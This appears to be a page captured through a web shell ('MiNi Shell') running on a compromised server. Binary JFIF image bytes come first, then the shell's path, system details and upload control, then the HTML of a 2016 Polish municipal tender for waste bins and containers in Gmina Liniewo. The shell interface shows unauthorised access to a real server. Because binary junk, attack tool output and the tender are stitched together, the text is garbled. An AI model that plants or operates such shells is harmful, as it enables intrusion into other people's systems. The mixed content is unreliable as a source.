JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160809/300571-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 300571 - 2016
              z dnia 2016-08-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Liniewo: Dostawa wyposażenia PSZOK-U oraz pojemników dla właścicieli nieruchomości objętych systemem  zbiórki odpadów zamieszkujących na terenie Gminy Liniewo<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br />nie</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej lub wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Prawo zamówień publicznych, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />nie</div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>nie<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych::</b><br /><b>Informacje dodatkowe:</b>nie<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Liniewo, krajowy numer identyfikacyjny
              19167519000000, ul.
              ul. Dworcowa 
              3,
              83420  
              Liniewo, woj.
              pomorskie, państwo
              , tel.
              586 878 520, e-mail
              , faks
              586 878 522.
              <br />
              adres strony internetowej  http://www.liniewo.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów zamówienia można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.liniewo.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.liniewo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px"><br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px"><br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br /><br /><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br /><br />
                Pod adres:
                <br />Gmina Liniewo ul. Dworcowa 3, 83-420 Liniewo, sekretariat pok 2</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnodostępne </b><div style="padding-left: 20px"><br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa wyposażenia PSZOK-U oraz pojemników dla właścicieli nieruchomości objętych systemem  zbiórki odpadów zamieszkujących na terenie Gminy Liniewo<br /><b>Numer referencyjny: </b>ZPGK/5/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify" /><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) </b><br /><b>Zamówienie podzielone jest na części:</b><br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia  <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie zadania pn: 
Część I
Dostawa na do Zamawiającego na teren Gminy Liniewo następującego asortymentu:
1. pojemniki na odpady biodegradowalne i popiół o pojemności 240 l  1005 szt. (pojemnik 2 kołowy wraz z pokrywą z tworzywa ), pojemnik wykonany z PE HD w kolorze brązowym 
2. pojemniki na odpady zmieszane o pojemności 240 l  1005 szt. (pojemnik 2 kołowy wraz z pokrywą z tworzywa ), pojemnik wykonany z PE HD w kolorze czarnym/grafitowym
3. pojemnik  o pojemności 1,1 m3  111 szt. (pojemnik 4 kołowy wraz z pokrywą z tworzywa- pojemniki do zbierania odpadów w tzw. gniazdach składających się z odpadów zmieszanych, szkła, papieru, tworzyw sztucznych, odpady biodegradowalne)
W tym: 
- odpady zmieszane- pojemnik wykonany z PE HD w kolorze czarnym/grafitowym oznaczony napisem ZMIESZNE z pokrywą pełną- 21 sztuk, 
- szkło- pojemnik wykonany z PE HD w kolorze zielonym oznaczonym napisem SZKŁO z pokrywą z otworami wsadowymi do wrzucania butelek- 22 sztuki,
- papier i tektura - pojemnik wykonany z PE HD w kolorze niebieskim oznaczonym napisem PAPIER z pokrywą z otworami wsadowymi do wrzucania papieru i tektury- 22 sztuki,
- metale i tworzywa sztuczne - pojemnik wykonany z PE HD w kolorze żółtym z oznaczonym napisem TWORZYWA SZTUCZNE z pokrywą z otworami wsadowymi do wrzucania tworzyw sztucznych- 24 sztuki,
- odpady biodegradowalne - pojemnik wykonany z PE HD w kolorze brązowym z oznaczonym napisem BIO/POPIÓŁ oraz NIE WRZUCAĆ GORĄCEGO POPIOŁU z pokrywa pełną- 22 sztuki,
Dodatkowo Wykonawca dostarczy Zamawiającemu naklejki wielobarwne do oklejenia pojemników z oznaczeniem rodzaju odpadów jakie można wrzucać do pojemnika. Minimalne wymiary naklejki dla pojemników 240 ltr. - 15cm x 25 cm, dla pojemników o pojemności 1100 ltr. -  25 cm x 35 cm. Zamawiający dostarczy wzór naklejki w terminie do 30 dni od dnia podpisania umowy.

Wymagane parametry pojemników 240 ltr. 

Pojemniki musza być sprawne, bez wad i uszkodzeń, odporne na udary mechaniczne, niskie temperatury, działanie promieni UV oraz erozję chemiczną, 
Pojemniki 240 ltr. musza być wyposażone w mechanizm jezdny  dwukołowy system jezdny (koła gumowane o średnicy 200 mm osadzone na zamkniętej osi stalowej), 
Zamykane pokrywą z góry z uchwytem do otwierania, 
Wyposażone w uchwyty transportowe i załadunkowe, 
Przystosowane do opróżniania przez samochody śmieciarki posiadające listwę grzebieniową; 
bezpieczeństwo produktu  skład chemiczny tworzywa i pigmentów nie ma negatywnego wpływu na zdrowie użytkowników  pojemniki posiadają atest Państwowego Zakładu Higieny  dołączyć atest, 
Wykonane zgodnie z normą EN 840,
Wykonane zgodnie z normą RAL GZ 951/1 lub równoważną  dołączyć certyfikat
Pojemniki mają być kompletne i spełniać funkcję do jakich są przeznaczone. 

Wymagane parametry pojemników 1100 ltr. 

Pojemniki musza być sprawne, bez wad i uszkodzeń, odporne na udary mechaniczne, niskie temperatury, działanie promieni UV oraz erozję chemiczną,
Pojemniki 240 ltr. musza być wyposażone w mechanizm jezdny  czterokołowy system jezdny (koła gumowane o średnicy 200 mm, w tym co najmniej dwa koła blokowane),
Zamykane pokrywą z otworami lub bez zgodnie z wymaganiami określonymi w punkcie 3 z góry z uchwytem do otwierania, 
Wyposażone w uchwyty transportowe i załadunkowe, 
Przystosowane do opróżniania przez samochody śmieciarki posiadające listwę grzebieniową; 
Bezpieczeństwo produktu  skład chemiczny tworzywa i pigmentów nie ma negatywnego wpływu na zdrowie użytkowników  pojemniki posiadają atest Państwowego Zakładu Higieny  dołączyć atest, 
Wykonane zgodnie z normą EN 840, 
Wykonane zgodnie z normą RAL GZ 951/1 lub równoważną  dołączyć certyfikat
Pojemniki mają być kompletne i spełniać funkcję do jakich są przeznaczone. 

Część II
Przedmiotem zamówienia jest dostawa do punktu selektywnej zbiórki odpadów komunalnych w Orlu, Orle 36 fabrycznie nowych, metalowych kontenerów wannowych typu mulda o pojemności:
a) Kontenery -min. 5 m3 - 3 szt. 
Kontenery, które należy dostarczyć mają być:
Wykonane według obowiązujących norm DIN 30722/DIN 30720-1 lub równoważnych;
Dostosowane do bramowego systemu załadunku/wyładunku;
Wykonane w wersji asymetrycznej otwartej;
Wyposażone w minimum cztery zaczepy boczne o średnicy minimalnej 45 mm do bramowego systemu załadunku;
Wyposażone w minimum dwa zaczepy pod dolny hak do wywrotu;
Wyposażone w haczyki do mocowania siatki zabezpieczającej/plandeki po obwodzie kontenera;
Wykonane z blachy czarnej lakierowanej lub ocynkowanej ogniowo;
Wykonane jako szczelne spawem ciągłym;
Wykonane z blachy o grubości: min. 5 mm (dno) i min. 3 mm (ściany);
O wymiarach głównych: długość maksymalna 3550 mm, szerokość maksymalna 1870 mm, wysokość maksymalna 1250 mm;
Zabezpieczone antykorozyjnie farbą podkładową i nawierzchniową w kolorze niebieskim nanoszoną metodą hydrodynamiczną;
Dodatkowo zabezpieczone wewnątrz środkiem antykorozyjnym;
Trwale dwustronnie oznakowane poprzez wspawanie na bokach kontenera blach z wyciętym napisem: GMINA LINIEWO. 
Do kontenerów należy dołączyć dokumentację techniczną zawierającą:
- deklarację zgodności;
- kartę katalogową z rysunkiem technicznym;
b) Kontenery - min. 7 m3 - 2 szt. 
Kontenery, które należy dostarczyć mają być:
Wykonane według obowiązujących norm DIN 30722/DIN 30720-1 lub równoważnych;
Dostosowane do bramowego systemu załadunku/wyładunku;
Wykonane w wersji asymetrycznej otwartej;
Wyposażone w minimum cztery zaczepy boczne o średnicy minimalnej 45 mm do bramowego systemu załadunku;
Wyposażone w minimum dwa zaczepy pod dolny hak do wywrotu;
Wyposażone w haczyki do mocowania siatki zabezpieczającej/plandeki po obwodzie kontenera;
Wykonane z blachy czarnej lakierowanej lub ocynkowanej ogniowo;
Wykonane jako szczelne spawem ciągłym;
Wykonane z blachy o grubości: min. 5 mm (dno) i min. 3 mm (ściany);
O wymiarach głównych: długość maksymalna 3550 mm, szerokość maksymalna 1870 mm, wysokość maksymalna 1500 mm;
Zabezpieczone antykorozyjnie farbą podkładową i nawierzchniową w kolorze niebieskim nanoszoną metodą hydrodynamiczną;
Dodatkowo zabezpieczone wewnątrz środkiem antykorozyjnym;
Trwale dwustronnie oznakowane poprzez wspawanie na bokach kontenera blach z wyciętym napisem: GMINA LINIEWO. 
Do kontenerów należy dołączyć dokumentację techniczną zawierającą:
- deklarację zgodności;
- kartę katalogową z rysunkiem technicznym.

c) Pojemnik na  zużyte akumulatory o pojemności min. 500 litrów tzn. skrzyniopaleta w ilości 1 sztuki o następujących parametrach:
Wykonana z polietylenu;
Wyposażona w gładkie dno i ścianki oraz zdejmowalną pokrywę;
O wytrzymałej konstrukcji umożliwiającej warstwowe składowanie;
Opierająca się na dwóch płozach;
Dostosowana do wózków widłowych;
O wytrzymałości cieplnej: -40*C - +60*C;
Odporna na działanie czynników chemicznych, zmienne warunki atmosferyczne oraz promieniowanie UV;
O nośności min. 500 kg;
Wykonana w kolorze szarym. 

d) Pojemnik na baterie o pojemności min. 150 litrów w ilości 1 sztuki o następujących parametrach:
- do stosowania wewnątrz i na zewnątrz budynków;
- wykonany z polietylenu; 
- odporny na działanie czynników chemicznych, zmienne warunki atmosferyczne oraz promieniowanie UV;
- wyposażony w zdejmowalną pokrywę z otworem wrzutowym o średnicy 12 - 15 cm zabezpieczonym np. fartuchem gumowym przed przedostawaniem się opadów i nieczystości z zewnątrz do wnętrza pojemnika;
- wykonany w kolorze pomarańczowym lub czerwonym.

e) Pojemnik na przeterminowane leki o pojemności min. 50 litrów w ilości 1 sztuka o następujących parametrach:
Do stosowania wewnątrz i na zewnątrz budynków;
Wykonany ze stalowej blachy ocynkowanej malowanej proszkowo;
Odporny na działanie czynników chemicznych, korozję, zmienne warunki atmosferyczne oraz promieniowanie UV;
Wyposażony w wewnętrzne wyjmowane wiadro wykonane z blachy ocynkowanej;
Wyposażony w zamek zamykany na klucz zabezpieczający przed dostępem osób postronnych;
Opróżnianie poprzez zwolnienie zamka;
Wyposażony w otwór lub dwa otwory wrzutowe o średnicy 12 - 15 cm zabezpieczony/e np. fartuchem gumowym przed przedostawaniem się opadów i nieczystości z zewnątrz do wnętrza pojemnika;
Wykonany w kolorze białym.

f) Pojemnik na chemikalia o pojemności min. 200 litrów w ilości 2 sztuki o następujących parametrach:
Do stosowania na zewnątrz budynków;
O wzmocnionej konstrukcji odpornej na uszkodzenia mechaniczne, zmienne warunki atmosferyczne, czynniki chemiczne oraz promieniowanie UV;
Wykonane z wysokiej jakości polietylenu (PE) dwu płaczowy wraz z pokrywą;
Przeznaczone do przechowywania substancji z grupy II i III (m.in. chemikalia, pojemniki po farbach itp.);
Wyposażone w szczelną pokrywę z uszczelką oraz dwiema metalowymi zapinkami uszczelniającymi zabezpieczającymi przed samoistnym otwarciem pokrywy;
Wyposażone w dwa kółka z tworzywa ułatwiające przemieszczanie;
Przystosowane do transportu wózkiem widłowym;
Przystosowane do magazynowania warstwowego;
Wykonane w kolorze niebieskim i czerwoną pokrywą.
g) Stelaż- 1005 kpl.  (metalowy fabrycznie nowy stelaż wraz z pokrywą z tworzywa sztucznego do zabezpieczania worków do  selektywnej zbiórki) 
Stojak potrójny rozstawiany, 
Stojak przystosowany do worków 120 l,
Wygodne i pewne mocowanie worka na obręczy za pomocą obejmy napinanej sprężyną,
Metalowa lub z tworzywa sztucznego pokrywa o średnicy 35 cm,
Konstrukcja metalowa,
Lakierowany proszkowo.
<br /><br /><b>II.5) Główny kod CPV: </b>34928480-6<br /><b>
                II.6) Całkowita wartość zamówienia <i>(jeżeli zamawiający podaje informacje o wartości zamówienia</i>:
              </b>
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 18/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełnia warunki jeśli posiada polisę potwierdzającą ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 30000 złotych (dotyczy części I i II zamówienia).   <br />
                Informacje dodatkowe
                <b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 a)	w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje dostawę 500 pojemników PE HD o pojemności minimum 240 ltr, (dotyczy części I zamówienia )
b)	w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje dostawę 3 pojemników stalowych  o pojemności minimum 5 m3, (dotyczy części II zamówienia ).
 <br />
                Czy zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br /></div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Oświadczenie o braku postaw do wykluczenia.
2.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
3.	Lista podmiotów należących do tej samej grupy kapitałowej.
Dokumenty dotyczące przynależności do tej samej grupy kapitałowej : Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1 Oświadczenie o spełnieniu warunków udziału w postępowaniu, 
2.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w trym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, zgodny z wzorem stanowiącym załącznik nr 3, do SIWZ
3.Opłaconą polisę potwierdzającą ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 30 000 złotych.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
